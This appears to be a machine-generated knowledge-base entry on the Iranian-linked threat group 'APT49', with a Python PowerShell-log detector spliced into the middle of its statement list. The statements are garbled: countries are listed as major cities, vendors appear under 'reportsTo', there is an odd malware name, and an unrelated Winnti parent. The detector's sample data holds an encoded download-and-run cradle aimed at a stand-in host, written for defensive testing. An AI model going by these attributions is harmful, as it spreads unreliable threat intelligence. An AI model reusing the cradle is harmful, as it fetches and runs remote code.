APT49

GPTKB entity

Statements (48)
Predicate Object
gptkbp:instanceOf cyber threat group
gptkbp:activeYearsStart 2017
gptkbp:alsoKnownAs gptkb:MuddyWater
gptkbp:associatedWith gptkb:Iranian_Ministry_of_Intelligence_and_Security
gptkbp:attributedTo publicly attributed by UK NCSC
publicly attributed by US Cyber Command
gptkbp:countryOfOrigin gptkb:Iran
https://www.w3.org/2000/01/rdf-schema#label APT49
gptkbp:industry gptkb:energy
gptkb:government
defense
telecommunications
academia
gptkbp:infrastructure cloud services
compromised servers
legitimate web services
gptkbp:majorCity gptkb:India
gptkb:Israel
gptkb:Pakistan
gptkb:Saudi_Arabia
gptkb:Turkey
gptkb:United_States
gptkbp:motive gptkb:intelligence_gathering
espionage
regional influence
gptkbp:notableEvent attacks on Middle Eastern government entities
attacks on energy sector organizations
attacks on telecommunications providers
gptkbp:reportsTo gptkb:Microsoft
gptkb:Palo_Alto_Networks
gptkb:FireEye
gptkb:US_Cybersecurity_and_Infrastructure_Security_Agency_(CISA)
UK National Cyber Security Centre (NCSC)
gptkbp:technique PowerShell scripts
credential harvesting
living off the land
spear phishing
remote access trojans
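The technique list above names PowerShell scripts and living off the land. The following is an added example, not code from this page, from GPTKB, or from any vendor report on the group: a small Python detector that scores PowerShell process-creation events for the flag combinations that script-based tradecraft relies on (hidden window, no profile, bypassed execution policy, encoded command) and decodes the -EncodedCommand payload so an analyst can read what would have run. The key="value" log layout, the host and user names, the c2.invalid URL and the sample lines are all constructed for the example and are not a real Sysmon or EDR schema.

```python
import base64
import binascii
import re

# Added example, not code from the page. The key="value" log layout is a
# hypothetical format chosen for the example, not a real Sysmon/EDR schema.

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')"


def encode_ps(script: str) -> str:
    """-EncodedCommand takes base64 of the script text encoded as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (not real events).
SAMPLE_LOGS = [
    # Hidden window, no profile, policy bypass, encoded download-and-run cradle.
    'ts=2024-03-01T09:12:44Z host=WS01 user=alice image="' + PS_EXE + '" '
    'cmdline="powershell.exe -NoP -W Hidden -Exec Bypass -enc ' + encode_ps(CRADLE) + '"',
    # Routine scheduled script: must not fire.
    r'ts=2024-03-01T09:13:01Z host=SRV02 user=SYSTEM image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmdline="powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"',
    # Encoded but harmless payload: encoding alone is a weak signal.
    'ts=2024-03-01T09:14:10Z host=WS03 user=bob image="' + PS_EXE + '" '
    'cmdline="powershell.exe -EncodedCommand ' + encode_ps("Get-Date") + '"',
    # Not PowerShell at all.
    r'ts=2024-03-01T09:15:00Z host=WS01 user=alice image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c dir"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Each indicator carries a weight; PowerShell accepts unambiguous prefixes
# of its switches, so the patterns cover the short forms too.
INDICATORS = {
    "hidden_window": (2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "no_profile": (1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    "policy_bypass": (2, re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
}
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression",
    re.I,
)
WEIGHTS = {"encoded_command": 1, "undecodable_payload": 2, "download_cradle": 3}
THRESHOLD = 4


def parse_line(line: str) -> dict:
    """Turn one key=value / key="value" log line into a dict."""
    return {k: (quoted or bare) for k, quoted, bare in FIELD_RE.findall(line)}


def decode_encoded_command(blob: str):
    """Decode an -EncodedCommand argument; None if it is not valid UTF-16LE base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_line(line: str):
    """Score one process-creation event; None when the image is not PowerShell."""
    ev = parse_line(line)
    if not ev.get("image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmd = ev.get("cmdline", "")
    hits = {name: w for name, (w, rx) in INDICATORS.items() if rx.search(cmd)}
    decoded = None
    m = ENCODED_RE.search(cmd)
    if m:
        hits["encoded_command"] = WEIGHTS["encoded_command"]
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            hits["undecodable_payload"] = WEIGHTS["undecodable_payload"]
    # Look for a download cradle in the visible command line (blob stripped so
    # base64 text cannot produce false token hits) and in the decoded script.
    visible = ENCODED_RE.sub("", cmd)
    if CRADLE_RE.search(visible) or (decoded and CRADLE_RE.search(decoded)):
        hits["download_cradle"] = WEIGHTS["download_cradle"]
    score = sum(hits.values())
    return {
        "host": ev.get("host"),
        "user": ev.get("user"),
        "score": score,
        "suspicious": score >= THRESHOLD,
        "indicators": sorted(hits),
        "decoded": decoded,
    }


def scan(lines):
    """Return only the findings that cross the alert threshold."""
    results = (analyze_line(line) for line in lines)
    return [r for r in results if r and r["suspicious"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding["host"], finding["user"], finding["score"], finding["indicators"])
        print("  decoded:", finding["decoded"])
```

Run stand-alone, only the first sample line is reported: the scheduled backup script and the encoded Get-Date each score 1 and stay below the threshold, and the cmd.exe event is skipped before scoring. The weights and threshold are illustrative; in a real deployment they would be tuned against the environment's baseline of legitimate scripted PowerShell use.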
gptkbp:usesMalware gptkb:BlackWater
gptkb:MuddyC3
gptkb:MuddyWater_RAT
gptkb:SharpStage
gptkb:Mimikatz
gptkb:POWERSTATS
MuddyC2Go
Seashell Bladder
gptkbp:bfsParent gptkb:Operation_Winnti
gptkbp:bfsLayer 7